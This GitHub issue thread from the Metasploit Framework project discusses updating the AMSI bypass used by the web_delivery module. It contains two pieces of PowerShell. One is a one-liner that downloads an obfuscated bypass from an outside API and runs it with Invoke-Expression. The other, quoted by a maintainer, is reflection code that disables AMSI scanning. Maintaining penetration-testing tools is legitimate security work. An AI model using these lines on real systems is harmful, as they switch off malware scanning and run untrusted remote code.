### ISSUE TITLE
Im trying to patch the AMSI bypass command for web_delivery module but dont know where's to patch :')

### ISSUE THREAD

**Issue by GetRektBoy724** [rapid7/metasploit-framework#15045]
## Summary
So IIRC AMSI bypass command that used on web_delivery module is outdated and easily get caught by the AMSI itself,my idea is to implement the [amsi.fail](https://amsi.fail/) API to generate different obfuscated AMSI bypass command every time the stager is executed,i really want to patch it and add a PR but i don't know where's to patch :joy: 

### Basic example
```
$accessAMBY = Invoke-WebRequest https://amsi-fail.azurewebsites.net/api/Generate -UseBasicParsing
Invoke-Expression $accessAMBY.Content
```
it's really simple, right?
it can be converted to a one-liner easily like
```
$accessAMBY = Invoke-WebRequest https://amsi-fail.azurewebsites.net/api/Generate -UseBasicParsing;Invoke-Expression $accessAMBY.Content
```
### Motivation
hmmm idk,i just want to fix something that i think is wrong

**Comment by GetRektBoy724** [comment]
can someone tell me where is the location of the AMSI bypass command/script that used on web_delivery module?

**Comment by adfoster-r7** [comment]
@GetRektBoy724 I think this might be close to the code that you're after:

```
    #
    # Return mattifestation's AMSI bypass
    #
    # @return [String] PowerShell code to bypass AMSI
    def self.bypass_amsi()
      %q{
        $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
        $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
      }
    end
```

If so, that specific code lives in a different gem that metasploit pulls in as a dependency:
https://github.com/rapid7/rex-powershell/blob/d1698cb8f119ff4deb982ebce76d7c5898085381/lib/rex/powershell/psh_methods.rb#L88-L97

**Comment by GetRektBoy724** [comment]
ahhh thx so much,gotta post a PR ASAP

**Comment by adfoster-r7** [comment]
Just cross-referencing the PR 👍 

https://github.com/rapid7/rex-powershell/pull/28
